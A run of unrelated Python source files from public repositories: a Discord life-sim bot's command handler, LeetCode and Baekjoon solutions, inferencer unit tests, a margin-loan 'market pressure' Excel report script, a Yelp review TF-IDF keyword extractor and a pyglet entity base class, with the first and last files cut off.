            try:
                user = db["life"]["disco_users"][message.author.id]
            except KeyError:
                await message.channel.send(f"You're a new face! `{prefix}start` to play or `{prefix} help` for info. {message.author.mention}")
            else:
                await message.channel.send(f"You can use ``` {prefix} help ``` for info! {message.author.mention}")
        con1 = message.content
        # accept both lower-case and as-configured prefix forms
        if con1.startswith(f"{prefix.lower()} ") or con1.startswith(f"{prefix} "):
            con = con1.split(" ", 1)
            con = con[1]
            if con == "quittt":
                # NOTE(review): exit() kills the whole process from a command
                await message.channel.send("``` shutting down ```")
                exit()
            elif con == "ping":
                await message.channel.send("pong!")
            elif con == "help":
                e=emb(f"**For more info:** ` {prefix} help [command] `", f"**Add ` {prefix} ` before any command**")
                e.set_author(name="Commands", url="", icon_url="https://image.freepik.com/free-vector/blue-pencil-with-pixel-art-style_475147-504.jpg")
                # em(): add one embed field listing the commands in b, backticked
                def em(a, b, c=""):
                    st = ""
                    for s in b:
                        st += f"`{s}`, "
                    st= st[:-2] + st[-1:]
                    return e.add_field(name=chr(173) + "\n" + chr(173) + a,value=f"{st} {c}", inline=False)
                em(":bookmark: Profile commands :bookmark:", ("start", "profile", "attributes", "boosts", "events", "likes", "inventory", "cooldowns"))
                em(":beginner: Menu commands :beginner:", ("bank", "shop", "jobs", "education", "health", "apartments", "relationship"))
                em(":gift: Rewards commands :gift:", ("daily", "weekly", "votetrend", "checkin", "redeem", "quiz"))
                em(":currency_exchange: Interaction commands :currency_exchange:", ("mail", "give", "phone"))
                em(":diamonds: Misc commands :diamonds:", ("action", "gameplayinfo", "rules", "noticeboard", "invite","msgdev"))
                await message.channel.send(embed=e)
            elif con == 'start':
                u = user = message.author
                try:
                    user = db["life"]["disco_users"][user.id]
                except KeyError:
                    msg = await message.channel.send(f">>> [ boots up ]\n\nYou want to play Disco-Life! \nCheck out gameplayinfo,\nMake sure you have read and\naccepted the rules .\nThen react with :thumbsup: !\n\n`{prefix.lower()} gameplayinfo`, `{prefix.lower()} rules`")
                # NOTE(review): for an already-registered user the except branch
                # never runs, so `msg` is unbound here -- confirm intended flow.
                await msg.add_reaction(emoji="\N{THUMBS UP SIGN}")
                # had an error for so long because of typing - ch(user, reaction) here :(
                def ch(reaction, user):
                    return user == u and str(reaction) == "\N{THUMBS UP SIGN}" and reaction.message == msg
                try:
                    r = await bot.wait_for("reaction_add", timeout=25.0, check = ch)
                    del r
                except asyncio.exceptions.TimeoutError:
                    await message.channel.send("`TimeOutError`")
                else:
                    del msg
                    msg = f"Hello {message.author.name}.\nI work for Discorp inc. And you are a product of our project Disco-Life!\nNow we intend to observe how you live in Disco-Verse, i hope you are ready!"
                    today = date.today().strftime("%d-%m-%Y")
                    e =emb("[New] Text Message ", f"`{str(today)}`\n\n" + msg)
                    e.set_author(name = "Agent Disco", url = "", icon_url = "http://clipart-library.com/image_gallery/n829721.jpg")
                    await message.channel.send(embed=e)
            else:
                await message. channel.send("`Err : Invalid command.`")
| p-r-o-m-e/-DISCONTINUED-Python_discordBot2 | main.py | main.py | py | 4,630 | python | en | code | 0 | github-code | 50 |
class Solution:
    def minSubArrayLen(self, target: int, nums: List[int]) -> int:
        """Length of the shortest contiguous subarray with sum >= target (0 if none).

        Sliding window: extend the right edge, then shrink from the left while
        the window sum still meets the target. O(n) time, O(1) space.
        """
        best = inf
        window_sum = 0
        left = 0
        for right, value in enumerate(nums):
            window_sum += value
            while window_sum >= target:
                best = min(best, right - left + 1)
                window_sum -= nums[left]
                left += 1
        return 0 if best == inf else best
# 209 follow-up: 862. what if the numbers can be negative? monostack
class Solution:
    def shortestSubarray(self, nums: List[int], k: int) -> int:
        """Shortest subarray with sum >= k, allowing negatives (-1 if none).

        Monotonic deque over running prefix sums: pop from the front while the
        current prefix minus the front prefix reaches k (candidate answers),
        and pop from the back to keep the stored prefixes strictly increasing.
        """
        n = len(nums)
        best = n + 1
        prefix = 0
        window = collections.deque([(0, -1)])  # (prefix sum, index)
        for idx, value in enumerate(nums):
            prefix += value
            while window and window[0][0] <= prefix - k:
                best = min(best, idx - window.popleft()[1])
            while window and window[-1][0] >= prefix:
                window.pop()
            window.append((prefix, idx))
        return -1 if best == n + 1 else best
| MengSunS/daily-leetcode | two_pointers/209.py | 209.py | py | 976 | python | en | code | 0 | github-code | 50 |
25156563766 | import torch
import numpy as np
from time import sleep
from ai.model import Model, fc
from ai.infer import Inferencer
def test_inferencer():
    """Smoke test: an Inferencer wrapping a model matches direct model calls."""
    model = Model(fc(8, 8)).init().eval()
    inferencer = Inferencer(model, batch_size=1)
    assert_parity(model, inferencer)
def test_param_update():
    """After pushing new weights to the inferencer, outputs must match again."""
    model = Model(fc(8, 8)).init().eval()
    inferencer = Inferencer(model, batch_size=1)
    # reinitialize model params and send to inferencer
    model.init()
    inferencer.update_params(model.state_dict())
    sleep(2)  # NOTE(review): fixed sleep to let the worker apply params -- flaky
    assert_parity(model, inferencer)
def test_batching():
    """With batch_size=8 and 16 requests, the worker should batch some of them."""
    model = Model(fc(8, 8)).init().eval()
    inferencer = Inferencer(model, batch_size=8, debug=True)
    inputs = [torch.randn(1, 8) for _ in range(16)]
    with torch.no_grad():
        gt = [model(x) for x in inputs]
    # each request is an (args, kwargs) pair for one forward call
    outputs = inferencer.multi_infer([([inputs[i]], {}) for i in range(16)])
    for y1, y2 in zip(outputs, gt):
        assert close(y1, y2)
    info = inferencer.debug()
    print(info)
    # avg_batch_size > 1 means at least two requests were served in one batch
    assert info['avg_batch_size'] > 1
def assert_parity(model, inferencer):
    """Assert the inferencer's output matches a direct model forward pass."""
    sample = torch.randn(1, 8)
    with torch.no_grad():
        expected = model(sample)
        actual = inferencer(sample)
    assert close(expected, actual)
def close(a, b):
    """Check two tensors for approximate element-wise equality via numpy."""
    lhs, rhs = a.numpy(), b.numpy()
    return np.allclose(lhs, rhs, rtol=1e-4, atol=1e-6)
| calvinpelletier/ai | tests/infer/test_inferencer.py | test_inferencer.py | py | 1,283 | python | en | code | 0 | github-code | 50 |
17678326104 | from automation.risk_management import *
def run( # chạy hàng ngày
run_time = dt.datetime.now()
):
start = time.time()
info = get_info('daily',run_time)
period = info['period']
dataDate = info['end_date']
folder_name = info['folder_name']
# create folder
if not os.path.isdir(join(dept_folder,folder_name,period)):
os.mkdir((join(dept_folder,folder_name,period)))
###################################################
###################################################
###################################################
# list các tài khoản nợ xấu cố định và loại bỏ thêm 1 tài khoản tự doanh
badDebtAccounts = {
'022C078252',
'022C012620',
'022C012621',
'022C012622',
'022C089535',
'022C089950',
'022C089957',
'022C050302',
'022C006827',
'022P002222',
}
detailTable = pd.read_sql(
f"""
WITH
[BranchTable] AS (
SELECT DISTINCT
[relationship].[account_code],
[branch].[branch_name]
FROM [relationship]
LEFT JOIN [branch] ON [relationship].[branch_id] = [branch].[branch_id]
WHERE [relationship].[date] = '{dataDate}'
),
[LoanTable] AS (
SELECT
[BranchTable].[branch_name] [Location],
[margin_outstanding].[account_code] [Custody],
SUM([principal_outstanding]) [OriginalLoan],
SUM([interest_outstanding]) [Interest],
SUM([principal_outstanding])+SUM([interest_outstanding])+SUM([fee_outstanding]) [TotalLoan]
FROM [margin_outstanding]
LEFT JOIN [BranchTable]
ON [margin_outstanding].[account_code] = [BranchTable].[account_code]
WHERE [margin_outstanding].[date] = '{dataDate}'
AND [margin_outstanding].[type] IN (N'Margin', N'Trả chậm', N'Bảo lãnh')
AND [margin_outstanding].[account_code] NOT IN {iterable_to_sqlstring(badDebtAccounts)}
GROUP BY [BranchTable].[branch_name], [margin_outstanding].[account_code]
),
[CashMargin] AS (
SELECT
[rmr0062].[account_code] [Custody],
SUM([rmr0062].[cash]) [CashAndPIA],
SUM([rmr0062].[margin_value]) [MarginValue]
FROM [rmr0062]
WHERE [rmr0062].[date] = '{dataDate}' AND [rmr0062].[loan_type] = 1
GROUP BY [rmr0062].[account_code]
),
[Asset] AS (
SELECT
[sub_account].[account_code] [Custody],
SUM([rmr0015].[market_value]) [TotalAssetValue]
FROM [rmr0015]
LEFT JOIN [sub_account]
ON [sub_account].[sub_account] = [rmr0015].[sub_account]
WHERE [rmr0015].[date] = '{dataDate}'
GROUP BY [account_code]
),
[MidResult] AS (
SELECT
[LoanTable].*,
ISNULL([CashMargin].[CashAndPIA],0) [CashAndPIA],
ISNULL([CashMargin].[MarginValue],0) [MarginValue],
ISNULL([Asset].[TotalAssetValue],0) [TotalAssetValue],
CASE
WHEN ISNULL([CashMargin].[CashAndPIA],0) > [LoanTable].[TotalLoan] THEN 100
WHEN ISNULL([CashMargin].[MarginValue],0) = 0 THEN 0
ELSE (1 - ([LoanTable].[TotalLoan] - [CashMargin].[CashAndPIA]) / [CashMargin].[MarginValue]) * 100
END [MMRMA],
CASE
WHEN ISNULL([CashMargin].[CashAndPIA],0) > [LoanTable].[TotalLoan] THEN 100
WHEN ISNULL([Asset].[TotalAssetValue],0) = 0 THEN 0
ELSE (1 - ([LoanTable].[TotalLoan] - [CashMargin].[CashAndPIA]) / [Asset].[TotalAssetValue]) * 100
END [MMRTA],
'' [Note]
FROM [LoanTable]
LEFT JOIN [CashMargin] ON [LoanTable].[Custody] = [CashMargin].[Custody]
LEFT JOIN [Asset] ON [LoanTable].[Custody] = [Asset].[Custody]
)
SELECT
ROW_NUMBER() OVER (ORDER BY [MidResult].[MMRTA],[MidResult].[MMRMA]) [No.],
[MidResult].*,
CASE
WHEN [MidResult].[MMRTA] BETWEEN 80 AND 100 THEN '[80-100]'
WHEN [MidResult].[MMRTA] BETWEEN 75 AND 80 THEN '[75-80]'
WHEN [MidResult].[MMRTA] BETWEEN 70 AND 75 THEN '[70-75]'
WHEN [MidResult].[MMRTA] BETWEEN 65 AND 70 THEN '[65-70]'
WHEN [MidResult].[MMRTA] BETWEEN 60 AND 65 THEN '[60-65]'
WHEN [MidResult].[MMRTA] BETWEEN 55 AND 60 THEN '[55-60]'
WHEN [MidResult].[MMRTA] BETWEEN 50 AND 55 THEN '[50-55]'
WHEN [MidResult].[MMRTA] BETWEEN 45 AND 50 THEN '[45-50]'
WHEN [MidResult].[MMRTA] BETWEEN 40 AND 45 THEN '[40-45]'
WHEN [MidResult].[MMRTA] BETWEEN 35 AND 40 THEN '[35-40]'
WHEN [MidResult].[MMRTA] BETWEEN 30 AND 35 THEN '[30-35]'
WHEN [MidResult].[MMRTA] BETWEEN 25 AND 30 THEN '[25-30]'
WHEN [MidResult].[MMRTA] BETWEEN 20 AND 25 THEN '[20-25]'
WHEN [MidResult].[MMRTA] BETWEEN 15 AND 20 THEN '[15-20]'
WHEN [MidResult].[MMRTA] BETWEEN 10 AND 15 THEN '[10-15]'
ELSE '[00-10]'
END [Group]
FROM [MidResult]
WHERE [MidResult].[OriginalLoan] <> 0
ORDER BY [MidResult].[MMRTA],[MidResult].[MMRMA]
""",
connect_DWH_CoSo
)
summaryTable = detailTable.groupby('Group')['OriginalLoan'].agg(['count','sum'])
groupsMapper = {
'[00-10]':'Market Pressure < 10%',
'[10-15]':'10%<=Market Pressure < 15%',
'[15-20]':'15%<=Market Pressure < 20%',
'[20-25]':'20%<=Market Pressure < 25%',
'[25-30]':'25%<=Market Pressure < 30%',
'[30-35]':'30%<=Market Pressure < 35%',
'[35-40]':'35%<=Market Pressure < 40%',
'[40-45]':'40%<=Market Pressure < 45%',
'[45-50]':'45%<=Market Pressure < 50%',
'[50-55]':'50%<=Market Pressure < 55%',
'[55-60]':'55%<=Market Pressure < 60%',
'[60-65]':'60%<=Market Pressure < 65%',
'[65-70]':'65%<=Market Pressure < 70%',
'[70-75]':'70%<=Market Pressure < 75%',
'[75-80]':'75%<=Market Pressure < 80%',
'[80-100]':'Market Pressure >= 80%'
}
summaryTable = summaryTable.reindex(groupsMapper.keys()).fillna(0).reset_index()
summaryTable['Group'] = summaryTable['Group'].map(groupsMapper)
summaryTable = summaryTable.rename({'count':'AccountNumber','sum':'Outstanding'},axis=1)
summaryTable['Outstanding'] /= 1000000
summaryTable['Proportion'] = summaryTable['Outstanding'] / summaryTable['Outstanding'].sum() * 100
###################################################
###################################################
###################################################
t0_day = dataDate[-2:]
t0_month = calendar.month_name[int(dataDate[5:7])]
t0_year = dataDate[0:4]
file_name = f'RMD_Market Pressure _end of {t0_day}.{t0_month} {t0_year}.xlsx'
writer = pd.ExcelWriter(
join(dept_folder,folder_name,period,file_name),
engine='xlsxwriter',
engine_kwargs={'options':{'nan_inf_to_errors':True}}
)
workbook = writer.book
###################################################
###################################################
###################################################
# Sheet Summary
cell_format = workbook.add_format(
{
'bold': True,
'align': 'center',
'valign': 'vbottom',
'font_size': 12,
'font_name': 'Calibri'
}
)
title_red_format = workbook.add_format(
{
'bold': True,
'align': 'center',
'valign': 'vbottom',
'font_size': 12,
'font_name': 'Calibri',
'color': '#FF0000'
}
)
subtitle_1_format = workbook.add_format(
{
'bold': True,
'italic': True,
'align': 'center',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri'
}
)
subtitle_1_color_format = workbook.add_format(
{
'bold': True,
'italic': True,
'align': 'center',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'color': '#FF0000'
}
)
subtitle_2_format = workbook.add_format(
{
'bold': True,
'align': 'left',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri'
}
)
headers_format = workbook.add_format(
{
'bold': True,
'text_wrap':True,
'border':1,
'align': 'center',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri'
}
)
text_left_merge_format = workbook.add_format(
{
'border': 1,
'align': 'left',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri'
}
)
text_left_format = workbook.add_format(
{
'border':1,
'align': 'left',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri'
}
)
text_left_color_format = workbook.add_format(
{
'border': 1,
'bold':True,
'align': 'left',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri',
'color': '#FF0000'
}
)
num_right_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '0'
}
)
sum_format = workbook.add_format(
{
'bold':True,
'border': 1,
'align': 'right',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '#,##0'
}
)
money_normal_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format':'_(* #,##0_);_(* (#,##0);_(* "-"??_);_(@_)'
}
)
money_small_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '_(* #,##0.00_);_(* (#,##0.00);_(* "-"??_);_(@_)'
}
)
percent_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '0.00'
}
)
headers = [
'Criteria',
'No of accounts',
'Outstanding',
'% Total Oustanding'
]
subtitle_1 = f'Data is as at end {t0_day}.{t0_month} {t0_year} (it is not inculde 08 accounts that belong to Accumulated Negative Value)'
subtitle_2 = 'C. Market Pressure (%) is used to indicate the breakeven point of loan with assumption that whole portfolio may drop at same percentage.'
summary_sheet = workbook.add_worksheet('Summary')
summary_sheet.hide_gridlines(2)
summary_sheet.set_column('A:A',31)
summary_sheet.set_column('B:B',15)
summary_sheet.set_column('C:C',14)
summary_sheet.set_column('D:D',11)
summary_sheet.set_column('E:E',19)
summary_sheet.set_column('F:F',21)
summary_sheet.set_column('G:G',18,options={'hidden':1})
summary_sheet.merge_range('A1:I1','',cell_format)
summary_sheet.write_rich_string(
'A1','SUMMARY RISK REPORT FOR ',title_red_format,'Market Pressure (%)',cell_format
)
summary_sheet.merge_range('A2:F2',subtitle_1,subtitle_1_format)
summary_sheet.merge_range('A3:F3','',cell_format)
summary_sheet.write_rich_string(
'A3', 'Unit for Outstanding: ',subtitle_1_color_format,'million dong',subtitle_1_format
)
summary_sheet.write('A4',subtitle_2,subtitle_2_format)
summary_sheet.write_row('A6',headers,headers_format)
summary_sheet.write('A7','Market Pressure < 10%',text_left_merge_format)
summary_sheet.write_rich_string('A8','10%<= Market Pressure',text_left_color_format,' <15%',text_left_format)
summary_sheet.write_rich_string('A9','15%<= Market Pressure',text_left_color_format,' <20%',text_left_format)
summary_sheet.write_rich_string('A10','20%<= Market Pressure',text_left_color_format,' <25%',text_left_format)
summary_sheet.write_rich_string('A11','25%<= Market Pressure',text_left_color_format,' <30%',text_left_format)
summary_sheet.write_rich_string('A12','30%<= Market Pressure',text_left_color_format,' <35%',text_left_format)
summary_sheet.write_rich_string('A13','35%<= Market Pressure',text_left_color_format,' <40%',text_left_format)
summary_sheet.write_rich_string('A14','40%<= Market Pressure',text_left_color_format,' <45%',text_left_format)
summary_sheet.write_rich_string('A15','45%<= Market Pressure',text_left_color_format,' <50%',text_left_format)
summary_sheet.write_rich_string('A16','50%<= Market Pressure',text_left_color_format,' <55%',text_left_format)
summary_sheet.write_rich_string('A17','55%<= Market Pressure',text_left_color_format,' <60%',text_left_format)
summary_sheet.write_rich_string('A18','60%<= Market Pressure',text_left_color_format,' <65%',text_left_format)
summary_sheet.write_rich_string('A19','65%<= Market Pressure',text_left_color_format,' <70%',text_left_format)
summary_sheet.write_rich_string('A20','70%<= Market Pressure',text_left_color_format,' <75%',text_left_format)
summary_sheet.write_rich_string('A21','75%<= Market Pressure',text_left_color_format,' <80%',text_left_format)
summary_sheet.write_rich_string('A22','Market Pressure',text_left_color_format,' >=80%', text_left_format)
summary_sheet.write_column('B7',summaryTable['AccountNumber'],num_right_format)
summary_sheet.write_column('D7',summaryTable['Proportion'],percent_format)
for loc, value in enumerate(summaryTable['Outstanding']):
if value > 100 or value == 0:
fmt = money_normal_format
else:
fmt = money_small_format
summary_sheet.write(f'C{loc+7}',value,fmt)
sum_row = summaryTable.shape[0] + 7
summary_sheet.write(f'A{sum_row}','Total',headers_format)
summary_sheet.write(f'B{sum_row}',summaryTable['AccountNumber'].sum(),sum_format)
summary_sheet.write(f'C{sum_row}',summaryTable['Outstanding'].sum(),sum_format)
summary_sheet.write(f'D{sum_row}','', sum_format)
###################################################
###################################################
###################################################
# Sheet Detail
sum_color_format = workbook.add_format(
{
'bold': True,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '#,##0',
'color': '#FF0000'
}
)
sum_format = workbook.add_format(
{
'bold': True,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '#,##0',
}
)
header_1_format = workbook.add_format(
{
'bold': True,
'text_wrap': True,
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman',
'bg_color': '#FFC000'
}
)
header_2_format = workbook.add_format(
{
'bold': True,
'text_wrap': True,
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman',
'bg_color': '#FFF2CC'
}
)
header_3_format = workbook.add_format(
{
'bold': True,
'text_wrap': True,
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman',
'color': '#FF0000',
'bg_color': '#FFF2CC'
}
)
text_center_format = workbook.add_format(
{
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman'
}
)
money_format = workbook.add_format(
{
'border':1,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '_(* #,##0_);_(* (#,##0);_(* "-"??_);_(@_)'
}
)
percent_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '0.00'
}
)
headers_1 = [
'No.',
'Location',
'Custody',
'Original Loan',
'Interest',
'Total Loan',
]
headers_2 = [
'Total Cash & PIA (MR0062 có vay xuất cuối ngày làm việc)',
'Total Margin value (RMR0062)',
'Total Asset Value (RMR0015 with market price)'
]
headers_3 = [
'MMR (base on Marginable Asset)',
'MMR (base on Total Asset)'
]
detail_sheet = workbook.add_worksheet('Detail')
detail_sheet.set_column('A:A',6)
detail_sheet.set_column('B:B',12)
detail_sheet.set_column('C:C',17)
detail_sheet.set_column('D:F',19)
detail_sheet.set_column('G:J',18,options={'hidden':1})
detail_sheet.set_column('K:K',18)
detail_sheet.set_column('L:L',16)
detail_sheet.set_row(1,30)
detail_sheet.write('A1',detailTable.shape[0],sum_color_format)
detail_sheet.write('D1',detailTable['OriginalLoan'].sum(),sum_color_format)
detail_sheet.write('E1',detailTable['OriginalLoan'].sum()/10e6,sum_format)
detail_sheet.write_row('A2',headers_1,header_1_format)
detail_sheet.write_row('G2',headers_2,header_2_format)
detail_sheet.write_row('J2',headers_3,header_3_format)
detail_sheet.write('L2','Group/Deal',header_2_format)
detail_sheet.write_column('A3',detailTable['No.'],text_center_format)
detail_sheet.write_column('B3',detailTable['Location'],text_center_format)
detail_sheet.write_column('C3',detailTable['Custody'],text_center_format)
detail_sheet.write_column('D3',detailTable['OriginalLoan'],money_format)
detail_sheet.write_column('E3',detailTable['Interest'],money_format)
detail_sheet.write_column('F3',detailTable['TotalLoan'],money_format)
detail_sheet.write_column('G3',detailTable['CashAndPIA'],money_format)
detail_sheet.write_column('H3',detailTable['MarginValue'],money_format)
detail_sheet.write_column('I3',detailTable['TotalAssetValue'],money_format)
detail_sheet.write_column('J3',detailTable['MMRMA'],percent_format)
detail_sheet.write_column('K3',detailTable['MMRTA'],percent_format)
detail_sheet.write_column('L3',['']*detailTable.shape[0],money_format)
###########################################################################
###########################################################################
###########################################################################
writer.close()
if __name__=='__main__':
print(f"{__file__.split('/')[-1].replace('.py','')}::: Finished")
else:
print(f"{__name__.split('.')[-1]} ::: Finished")
print(f'Total Run Time ::: {np.round(time.time()-start,1)}s')
| TranHuyNam177/DataAnalytics-New | automation/risk_management/MarketPressureReport.py | MarketPressureReport.py | py | 20,420 | python | en | code | 0 | github-code | 50 |
# Difference between 5 and 6 (Baekjoon 2864)
# https://www.acmicpc.net/problem/2864
# Every digit 5 or 6 on the broken display is ambiguous: read all of them as 5
# for the minimum possible sum, and all of them as 6 for the maximum.
# str.replace covers both directions in a single pass per number.
tokens = input().split()
min_result = []
max_result = []
for token in tokens:
    min_result.append(int(token.replace('6', '5')))
    max_result.append(int(token.replace('5', '6')))
print(sum(min_result),sum(max_result)) | PangPangGod/Programmers_PY | BaekJoon_2864.py | BaekJoon_2864.py | py | 437 | python | en | code | 0 | github-code | 50 |
72665457116 |
import pandas as pd
import numpy as np
from ...librarys import env
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import ENGLISH_STOP_WORDS as esw
from . import base
class Reviews():
    """Builds per-business keyword profiles from Yelp review/tip text using TF-IDF."""

    def load(self):
        """Read the pre-cleaned review and tip CSVs and merge their text per business.

        Returns:
            (items, geoItems): ``items`` maps business_id -> all of that
            business's review/tip text joined into one string; ``geoItems`` is
            currently never populated (reserved for geo-tagged output).
            Returns None when either CSV cannot be read.
        """
        dataPath = env.getDataPath()
        try:
            reviews1 = pd.read_csv(dataPath+"yelp_dataset/newReviewAfterStopwords.csv")
            reviews2 = pd.read_csv(dataPath+"yelp_dataset/newTipAfterStopwords.csv")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # still propagate; any read failure keeps the original
            # "silently return None" contract.
            return
        frames = [reviews2, reviews1]
        combined = pd.concat(frames)
        # Keep columns 1..2 of the raw table — per the original debug note this
        # is [business_id, review_text]; TODO confirm against the CSV layout.
        self.data = combined.to_numpy().T[1:3].T
        items = {}
        geoItems = {}
        for i in range(len(self.data)):
            business_id = self.data[i][0]
            text = str(self.data[i][1])
            if business_id in items:
                # Append this review to the text already collected for the business.
                items[business_id] = ' '.join([str(items[business_id]), text])
            else:
                items[business_id] = text
        return items, geoItems

    def full_process(self, data_to_process):
        """Run TF-IDF over an (N, 2) array of [business_id, text] rows.

        Returns an (N, 3) object array: [business_id, top_words, top_weights].
        """
        data_to_process = data_to_process.T
        besinessID = data_to_process[0]
        text = data_to_process[1]
        words, weights = self._my_TF_IDF(text)
        output = self._my_process_for_IFIDF(besinessID, words, weights)
        return output

    def _my_TF_IDF(self, text):
        """Vectorize the corpus with TF-IDF using an extended stopword list.

        Returns:
            words: (N, V) object array repeating the vocabulary per document.
            weights: (N, V) array of TF-IDF weights.
        """
        myStopWords = ['00','got','ll',
                       'going' ,'way', 'better', 'happy',
                       'said','bit',"awesome","excellent","better","sure",
                       'know' ,'say', 'work', 'wasn','want','day','live','roll','location','hound','perfect',
                       'time', 'restaurant', 'night', 'downtown','don', 'didn',
                       'delicious' ,'love' , 'amazing' , 'little',
                       'come','went','definitely','pretty','people','hour',
                       've','menu','try','nice','really','phoenix','came','wait','best','ordered','order', 'like','just','good','great','food','place', '00a', '66', '00am', '00pm', '01', '04', '050d_xior1npcuwkbivaq', '0530', '06', '0600', '0630',
                       '07','09', '10', '100', '1000', '105', '10a', '10am', '11', '110', '115', '11am', '11dollars', '11pm',
                       '12','did','make',
                       '120', '1230', '12oz', '12p', '12pm', '13', '15', '15a', '15ish', '16', '17', '18', '19', '1950',
                       '1hour', '1hr', '1hr1', '1ish', '1pm', '1st', '20', '200', '2007', '2008', '2009', '2010',
                       '2011',
                       '20min', '21', '22', '24', '25', '26', '27', '28', '2hr', '2nd', '2oz', '2pm', '2x', '30', '300',
                       '300th', '30am', '30ish', '30mins', '30p', '30pm', '30s', '31', '35', '35mins', '37', '38', '3d',
                       '3oz',
                       '3rd', '3secs', '40', '40a', '40mins', '45', '45a', '45am', '45min', '47', '48', '480', '4oz',
                       '4pm',
                       '4star', '4x', '50', '500', '50s', '51cents', '51st', '53', '55am', '5hrs', '5jzlbw7os2kcja',
                       '5th',
                       '60', '600', '630', '645am', '6am', '6oz', '6zwwyxzvspp83yplkggr5g', '730', '745', '75', '7am',
                       '7items',
                       '7th', '801', '815', '85', '8am', '90', '930', '945', '95', '97', '98', '99', '9am',
                       '_shdjvyidwqmo9lphwsrcg', 'aaaahing', 'aah']
        myStopWords2 = ['05', '101', '10min', '128', '14', '15min', '15pm', '16th', '1800s', '1980', '1985', '1988',
                        '1red',
                        '2006', '2014', '2015', '2017', '2018', '23', '23rd', '29', '32', '3pm', '3x', '3year', '40th',
                        '42',
                        '44', '44oz', '44th', '45mins', '45pm', '49', '4b', '4th', '50pm', '55', '56th', '59', '5and',
                        '5pm',
                        '63', '65', '69', '72', '77', '80', '80s', '83', '845', '8pm', '8th', '90s', '9pm', '9th',
                        '_____',
                        'a1']
        stopWords = myStopWords + list(myStopWords2) + list(esw)
        vectorizer = TfidfVectorizer(min_df=1, stop_words=stopWords)
        # Fit and transform once; the original fitted the same corpus twice
        # (the first fit_transform result was discarded), doubling the most
        # expensive step for identical results.
        weights = vectorizer.fit_transform(text).toarray()
        words = vectorizer.get_feature_names()
        words = np.array([words] * len(weights))
        weights = np.array(weights)
        return words, weights

    def _my_process_for_IFIDF(self, besinessID, words, weights):
        """For each document, sort the vocabulary by descending TF-IDF weight
        and keep the top 30 words and weights alongside the business id."""
        output = np.zeros((len(weights), 3), dtype=object)
        output.T[0] = besinessID
        for i in range(len(weights)):
            now = np.zeros((2, len(weights[0])), dtype=object)
            now[0] = words[i]
            now[1] = weights[i]
            # Negate so argsort yields descending weight order, then reorder
            # both rows (words and weights) with the same column permutation.
            now = now[:, (now[1] * -1).argsort()]
            outnowWords = now[0][:30].flatten().T
            outnowWeights = now[1][:30].flatten().T
            output[i][1] = outnowWords
            output[i][2] = outnowWeights
        return output
base.regObj(Reviews())
| tonystevenj/prosperity-adviser-fall2019 | DataVisualization/Server/models/data/reviews.py | reviews.py | py | 5,674 | python | en | code | 5 | github-code | 50 |
72262649754 | '''applib.model.entity -- generic model objects
'''
import re
import applib
import pyglet
from applib.engine import sprite
def _normalise(string):
'''Normalise the given string.
'''
string = string.strip().lower()
string = re.sub(r'\s+', '_', string)
string = re.sub(r'[^a-z_]', '', string)
return string
class Entity(object):
    '''Base class for level-bound model objects.

    Subclasses that declare `group` and `name` have those identifiers
    normalised and are recorded in the global `index`; assets (texture and
    sprite) are loaded lazily on first access.
    '''

    #: The asset group to which the entity class belongs.
    group = None

    #: The name of the entity class within its asset group.
    name = None

    #: The global index of all entity classes: index[group][name] -> class.
    index = {}

    def __init_subclass__(cls):
        '''Normalise the subclass identifiers and register it in the index.'''
        if cls.group is not None:
            cls.group = _normalise(cls.group)
            cls.index.setdefault(cls.group, {})
        if cls.name is not None:
            cls.name = _normalise(cls.name)
            # NOTE(review): assumes `group` is set whenever `name` is — a
            # named class with group=None would raise KeyError here. Confirm.
            cls.index[cls.group][cls.name] = cls

    def __init__(self, level):
        '''Create an `Entity` attached to `level` (which may be None).'''
        self.level = level
        if level is not None:
            level.add_entity(self)

    def destroy(self):
        '''Detach the entity from its level, if it still has one.'''
        if self.level is None:
            return
        self.level.remove_entity(self)
        self.level = None

    #: Class-level cache for the texture shared by all instances.
    _texture = None

    @property
    def texture(self):
        '''Lazily load (and cache on the class) this entity's texture.'''
        if self._texture is None and self.group is not None and self.name is not None:
            type(self)._texture = pyglet.resource.texture(f'{self.group}/{self.name}.png')
        return self._texture

    #: Default (unbuilt) sprite; each instance caches its own in `_sprite`.
    _sprite = None

    @property
    def sprite(self):
        '''Lazily build (and cache on the instance) this entity's sprite.'''
        if self._sprite is None and self.texture is not None:
            self._sprite = sprite.EntitySprite(self.texture)
        return self._sprite

    def tick(self):
        '''Per-frame update hook; the base implementation does nothing.'''
| chardbury/paper-dragon-31 | applib/model/entity.py | entity.py | py | 1,937 | python | en | code | 1 | github-code | 50 |
553648911 | # Definition for a binary tree node.
class TreeNode(object):
